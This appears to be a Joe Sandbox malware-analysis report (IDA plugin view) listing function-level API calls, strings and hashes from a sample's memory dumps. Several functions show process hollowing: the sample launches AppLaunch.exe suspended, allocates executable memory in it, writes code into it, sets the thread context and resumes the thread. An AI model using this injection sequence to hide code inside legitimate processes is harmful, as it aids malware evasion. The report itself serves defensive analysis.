Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe$D
API String ID: 963392458-248988016
Opcode ID: db0f12aa751ca289fcc6da3b26cf52c038dca3d6a4e1ef34cd8789c73d0fd9a7
Instruction ID: ba449ecd51993cd21cb6c0e93acc3191e3faa84fb323b9449a1f0298800fe72f
Opcode Fuzzy Hash: db0f12aa751ca289fcc6da3b26cf52c038dca3d6a4e1ef34cd8789c73d0fd9a7
Instruction Fuzzy Hash: 54816771E40209EBCB10CF94DD01FAEBBB6FF59714F200219F509B62A1E7B15A91CB94

Uniqueness

Uniqueness Score: -1.00%

Function 001426D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 0014271B

Strings

uiyxgUYTstayudghyus, xrefs: 00142722

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ConsoleFree
String ID: uiyxgUYTstayudghyus
API String ID: 771614528-3115505298
Opcode ID: 09567940af214a222d6544a75cc7ed1174b2753ffce670b23574006d1ee126b8
Instruction ID: 721cb2f1228faad9b369d75bae7a15285cc42a386f4a319fb784a13c5b9cd77f
Opcode Fuzzy Hash: 09567940af214a222d6544a75cc7ed1174b2753ffce670b23574006d1ee126b8
Instruction Fuzzy Hash: 4C31F371544700EFD321AB64CC02B1AB7A4AF20B21F554565FE48AB6F2E7B5A8D0C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00141BDC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76
processmemoryinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00141B65
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00141C1B
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00141C3B
WriteProcessMemory.KERNELBASE(?,00000000,0016C000,?,00000000), ref: 00141C76

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 00141B60

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: Process$Memory$AllocCreateReadVirtualWrite
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
API String ID: 1962135352-448403072
Opcode ID: 72ecb09084338b8e48100cec4d86ce1065b0d96ff9639ba79bda96ab22d72560
Instruction ID: 38242cbc0ed265882b31b85c237e7d3fb0b14011563bb634d464b62190b571c2
Opcode Fuzzy Hash: 72ecb09084338b8e48100cec4d86ce1065b0d96ff9639ba79bda96ab22d72560
Instruction Fuzzy Hash: 19215774A40209FFDB24CB90DD4AFADBB75EF04714F240118F605BA2E0E7B16A40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0014FD68 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,F39A3E3B,?,0014FE75,?,?,?,00000000), ref: 0014FE29

Strings

api-ms-, xrefs: 0014FDBF
ext-ms-, xrefs: 0014FDD3

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 614ca1d7fa6b9e4350be6f7480bd8fcfd54d437346a378389f91b48e272bb89a
Instruction ID: b6e560f417844db9ac6f8a6dd57cbc263966cf8c5310f1b9897a49e15afd7a0f
Opcode Fuzzy Hash: 614ca1d7fa6b9e4350be6f7480bd8fcfd54d437346a378389f91b48e272bb89a
Instruction Fuzzy Hash: 1A21C331A00211EBCB319B65EC41A5B3768DF41762F260138F916BB3B2EB70ED42C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00149A9C Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00009940,00000000,00000000,00000000), ref: 00149AE5
GetLastError.KERNEL32(?,?,?,0014276E,00000000,00000000), ref: 00149AF1
__dosmaperr.LIBCMT ref: 00149AF8

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 1a42e857af59f760cfc2ea1070ef354420b92d15d3d313962f1b4fd861f11839
Instruction ID: d32bac436db4454915b4aae62a609ed4957144e0ad2e1da42c60709428090979
Opcode Fuzzy Hash: 1a42e857af59f760cfc2ea1070ef354420b92d15d3d313962f1b4fd861f11839
Instruction Fuzzy Hash: 2501BC7250421AEFCF15AFA0EC46AAF3BA9EF10365F200128F801971A0DB70CE50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001499F5 Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0014F961: GetLastError.KERNEL32(00000000,?,0014BC8E,0014FB4D,?,?,0014F85D,00000001,00000364,?,00000003,000000FF,?,00149965,00168EF0,0000000C), ref: 0014F965
Part of subcall function 0014F961: SetLastError.KERNEL32(00000000), ref: 0014FA07

CloseHandle.KERNEL32(?,?,?,00149B2C,?,?,0014999E,00000000), ref: 00149A26
FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00149B2C,?,?,0014999E,00000000), ref: 00149A3C
ExitThread.KERNEL32 ref: 00149A45

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: 1fd21207738babbcc05f9fd9f7a5ea8d45857ce105e0e344561d10b80eaed9e7
Instruction ID: ba4047548015eaa4cff7312fd4e7c2cb7082953514cf78269323f4b94e5be1bf
Opcode Fuzzy Hash: 1fd21207738babbcc05f9fd9f7a5ea8d45857ce105e0e344561d10b80eaed9e7
Instruction Fuzzy Hash: 10F08C30004700ABDB31AB75D808A6B3AA9AF00369F294664FC29DB6F1EB30DC82C751

Uniqueness

Uniqueness Score: -1.00%

Function 0014CF3F Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000002,?,0014CF39,00149B7B,00149B7B,?,00000002,F39A3E3B,00149B7B,00000002), ref: 0014CF50
TerminateProcess.KERNEL32(00000000,?,0014CF39,00149B7B,00149B7B,?,00000002,F39A3E3B,00149B7B,00000002), ref: 0014CF57
ExitProcess.KERNEL32 ref: 0014CF69

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b7a937ef0db566a7a9be68dbfe222d081bad63ab06e6ac6cf70b2aa4c6f775b8
Instruction ID: 31a7d3ea2e7e2dfb49d1984998a4a585dd0eecde9a29138b9baf17dc63ae1dc0
Opcode Fuzzy Hash: b7a937ef0db566a7a9be68dbfe222d081bad63ab06e6ac6cf70b2aa4c6f775b8
Instruction Fuzzy Hash: 09D09E31045308FBCF912F60ED0D9597F26AF50352B144010BA094A4B1DF35D99BDBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00141C9E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
threadinjectionprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00141B65
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 00141D06
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00141D3A
Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00141D52
ResumeThread.KERNELBASE(?), ref: 00141D6B

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 00141B60

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: Process$MemoryThreadWrite$ContextCreateResumeWow64
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
API String ID: 2015093061-448403072
Opcode ID: 937515bc2706ed9b12e86d0dc3f36be9841f644df684825195a4a6d608821a96
Instruction ID: 193ea4f6ab74dca5137a3bbdfcefb22a47d9d6eb7d800d4696bdc4dbfb0116a6
Opcode Fuzzy Hash: 937515bc2706ed9b12e86d0dc3f36be9841f644df684825195a4a6d608821a96
Instruction Fuzzy Hash: C4F03A71E80709FBEF24CA80CC56FADB775AB04B20F204141BA11BA2E0E7706D408B54

Uniqueness

Uniqueness Score: -1.00%

Function 00151628 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00150D72: GetConsoleOutputCP.KERNEL32(F39A3E3B,00000000,00000000,00149E6D), ref: 00150DD5

WriteFile.KERNEL32(FFBD36E8,00000000,?,00149D8D,00000000,00000000,00000000,00000000,00149B48,?,00149D8D,00149B48,00000024,00168F10,00000010,00149E6D), ref: 00151791
GetLastError.KERNEL32(?,00149D8D,00149B48,00000024,00168F10,00000010,00149E6D,00149B48,?,00000000,00000004), ref: 0015179B

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 432074847c346125b064592c149722e62fa0c5128ce45b699e74a56d19daa9d3
Instruction ID: dd4a819188f52e0e721a7cb6771ff1bc4b01566bad72a6160c03ec68901fc451
Opcode Fuzzy Hash: 432074847c346125b064592c149722e62fa0c5128ce45b699e74a56d19daa9d3
Instruction Fuzzy Hash: 1F618E71D04149FFDF168FA8C884BEEBBB9AF19305F154085EC20AE252D371D949CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0015122A Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00149E6D,?,00151777,?,00000000,00000000,?,00000000,00000000), ref: 001512C6
GetLastError.KERNEL32(?,00151777,?,00000000,00000000,?,00000000,00000000,00000000,00149B48,?,00149D8D,00149B48,00000024,00168F10,00000010), ref: 001512EC

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: af336b1a28a92292b9da2d567c4331bb1282ba7e0fa5bf10f18e4b6c9c489ee7
Instruction ID: a80eb4eaa35d9a677a23674f62f69d596ec482d650ed0ffe3739ea26f3574788
Opcode Fuzzy Hash: af336b1a28a92292b9da2d567c4331bb1282ba7e0fa5bf10f18e4b6c9c489ee7
Instruction Fuzzy Hash: 61218235A00219EBCF16CF69DC90AE9B7BAAB48302F2440A9ED15DB211D730DD86CB64

Uniqueness

Uniqueness Score: -1.00%

Function 001508E1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0015092D
GetFileType.KERNELBASE(00000000), ref: 0015093F

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 18a4164ca7172a63b8c5f1ea7ae3d36151574e76203cbba8c742d7f70b674d82
Instruction ID: 4a1b97e76dc3e3aaf88e9c9b0ef2cf33533fc656fa19042f38baa1d9d4982a25
Opcode Fuzzy Hash: 18a4164ca7172a63b8c5f1ea7ae3d36151574e76203cbba8c742d7f70b674d82
Instruction Fuzzy Hash: 83110D31104742C6E7354E7E8C98625BA95AB4E33AB340719D8BECE5F7C330D9C9D241

Uniqueness

Uniqueness Score: -1.00%

Function 00149940 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00168EF0,0000000C), ref: 00149953
ExitThread.KERNEL32 ref: 0014995A

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 3b83e11bd5cde242ddaa2f8ea8fc390f4911e1ca83d4998fd5eeee286a1613f8
Instruction ID: 8633a736d82ffe37368b051e8b2d173890d755acb24c298e379181b14bf31093
Opcode Fuzzy Hash: 3b83e11bd5cde242ddaa2f8ea8fc390f4911e1ca83d4998fd5eeee286a1613f8
Instruction Fuzzy Hash: 26F0C271A40704EFDB11BBB0E84AA6E3B75FF54711F204148F4059F6A2CB706941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0014FE33 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db5f1e21157a5f4fe8054a6154356f4895cc2b2ff5b4da57696f0df0b1caefb7
Instruction ID: 4603714c856b8c74a207f2a814aa056e73dc6d500765dc8fd9ae81682b9a6966
Opcode Fuzzy Hash: db5f1e21157a5f4fe8054a6154356f4895cc2b2ff5b4da57696f0df0b1caefb7
Instruction Fuzzy Hash: A501F9337002159B9B26CE69EC4095B3396AFC07227568134F904EB275DB30DC8397A0

Uniqueness

Uniqueness Score: -1.00%

Function 0014FAFB Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,0014F85D,00000001,00000364,?,00000003,000000FF,?,00149965,00168EF0,0000000C), ref: 0014FB3C

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5a87da497daa2cd4ce41768d3e64835101efb770cbaf7ff7007296543c878126
Instruction ID: df0871f03e51f8f6c69d1a1f353f4c17e71317749def8321fd425993ec3f1545
Opcode Fuzzy Hash: 5a87da497daa2cd4ce41768d3e64835101efb770cbaf7ff7007296543c878126
Instruction Fuzzy Hash: 8BF0E931244221AB9B212A62ED25B5B7748EF53771F19803ABC04DB2B0CF20DC0382E0

Uniqueness

Uniqueness Score: -1.00%

Function 00152FA5 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00156DAA,?,?,00156DAA,00000220,?,00000000,?), ref: 00152FD7

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 30a89c38b806ec6864722ab93539dd46cb739051b481e7dc01e62fa65bd4a2aa
Instruction ID: 9d3d7d7d8730b8c9aa328adca42318ce27cc33fc6331268cb6657343e8fd14cd
Opcode Fuzzy Hash: 30a89c38b806ec6864722ab93539dd46cb739051b481e7dc01e62fa65bd4a2aa
Instruction Fuzzy Hash: 28E06533149211EBD6253665FC04F6B76689F537A2F154113FC25AE4A0DB70CC4483E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0015980C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00159B2A,00000002,00000000,?,?,?,00159B2A,?,00000000), ref: 001598A5
GetLocaleInfoW.KERNEL32(?,20001004,00159B2A,00000002,00000000,?,?,?,00159B2A,?,00000000), ref: 001598CE
GetACP.KERNEL32(?,?,00159B2A,?,00000000), ref: 001598E3

Strings

OCP, xrefs: 00159860
ACP, xrefs: 0015982A

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 5492f9df5527de6092c9a22bb6ab349611a3f931f6f2ccfb74bed419805015cb
Instruction ID: cf45bb7053240bd120b4386a0f90656138f095e507390137cf8d61072f421917
Opcode Fuzzy Hash: 5492f9df5527de6092c9a22bb6ab349611a3f931f6f2ccfb74bed419805015cb
Instruction Fuzzy Hash: 3C21DA72A00208FBDB348F55D901B9773A7EF56B52B5A8424EC2ADF114E732DD49C392

Uniqueness

Uniqueness Score: -1.00%

Function 001599E1 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0014F810: GetLastError.KERNEL32(?,?,00149965,00168EF0,0000000C), ref: 0014F814
Part of subcall function 0014F810: SetLastError.KERNEL32(00000000), ref: 0014F8B6

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00159AED
IsValidCodePage.KERNEL32(00000000), ref: 00159B36
IsValidLocale.KERNEL32(?,00000001), ref: 00159B45
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00159B8D
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00159BAC

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: c9ddcc87b7cb9740128c76cd6173f5233cdea058d6c3de6ab88316dd08cddc82
Instruction ID: 749ebdbccd3e1ce254279a2cc1be23bf2a347394a34580a3a5909027ba46ffe5
Opcode Fuzzy Hash: c9ddcc87b7cb9740128c76cd6173f5233cdea058d6c3de6ab88316dd08cddc82
Instruction Fuzzy Hash: CC515C71A00209EAEF10DFA5DC81EAE77B8EF58702F144569E925EF190E7709948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0015907D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0014F810: GetLastError.KERNEL32(?,?,00149965,00168EF0,0000000C), ref: 0014F814
Part of subcall function 0014F810: SetLastError.KERNEL32(00000000), ref: 0014F8B6

